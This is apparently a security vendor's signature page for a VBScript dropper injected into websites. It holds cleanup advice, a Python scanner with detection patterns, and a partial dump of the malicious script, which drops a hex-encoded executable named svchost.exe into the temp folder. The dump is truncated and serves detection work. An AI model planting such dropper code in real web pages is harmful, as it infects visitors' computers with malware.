Malware Signatures

vb.injected.wshshell-dropper

VBScript malware is usually written to act as an accomplice to other malicious code, dropping and executing other files in the Windows environment. It mostly targets older versions of the Internet Explorer browser.
The WSHshell-dropper script is injected into the HTML code of web pages. It embeds the code of a malicious binary file, which it drops on the computers of visitors that have Windows Script Host (the Windows scripting engine) enabled.

Affecting

Any websites.

Cleanup

Check the integrity of your files. Search for the code we specified below, as this malware is typically not obfuscated and doesn't change much.
Also, you can sign up with us and let our team remove the malware for you.
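
One way to automate that search across a web root, as an added example (not code from this page or from the signature's authors): it flags VBScript blocks that combine the traits visible in the dump below, namely a hex string beginning with 4D5A (the "MZ" executable header), Scripting.FileSystemObject, GetSpecialFolder(2) (the temp folder) and an .exe file name. The function names, the extension list and the three-trait threshold are assumptions chosen for illustration.

```python
import re
from pathlib import Path

# VBScript <script> blocks; an injected block may lack its closing tag.
SCRIPT_RE = re.compile(
    r"<script[^>]*\blanguage\s*=\s*[\"']?vbscript[^>]*>(.*?)(?:</script>|\Z)",
    re.I | re.S)

# Traits taken from the dump on this page.
TRAITS = {
    "fso": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "temp_folder": re.compile(r"GetSpecialFolder\(\s*2\s*\)", re.I),  # 2 = temp folder
    "exe_name": re.compile(r'"[^"\r\n]+\.exe"', re.I),
    "mz_hex_blob": re.compile(r'"4D5A[0-9A-F]{32,}', re.I),  # hex of the "MZ" header
}

def scan_text(html):
    """Return [(line_number, matched_traits)] for each suspicious VBScript block."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        hits = sorted(n for n, rx in TRAITS.items() if rx.search(m.group(1)))
        # Assumed threshold: the embedded executable plus two more traits.
        if "mz_hex_blob" in hits and len(hits) >= 3:
            findings.append((html.count("\n", 0, m.start()) + 1, hits))
    return findings

def scan_tree(root, exts=(".html", ".htm", ".php", ".asp", ".aspx", ".tpl")):
    """Scan web files under root; return {path: findings} for flagged files only."""
    flagged = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                flagged[str(path)] = found
    return flagged

# Constructed samples: the hex string is a zero-filled placeholder, not a payload.
INFECTED = ('<html><body>Hello</body></html>\n'
            '<SCRIPT Language=VBScript><!--\n'
            'DropFileName = "svchost.exe"\n'
            'WriteData = "4D5A9000' + "00" * 40 + '"\n'
            'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
            'DropPath = FSO.GetSpecialFolder(2) & DropFileName\n')
CLEAN = ('<script language="vbscript">\n'
         'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
         'MsgBox FSO.GetSpecialFolder(2)\n</script>\n')
if __name__ == "__main__":
    print(scan_text(INFECTED))
    print(scan_text(CLEAN))
```

Compare any flagged file against a known-good copy before editing it, since the injected block is usually appended to otherwise legitimate markup.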

Dump


<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000A....skipped long code here......00000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath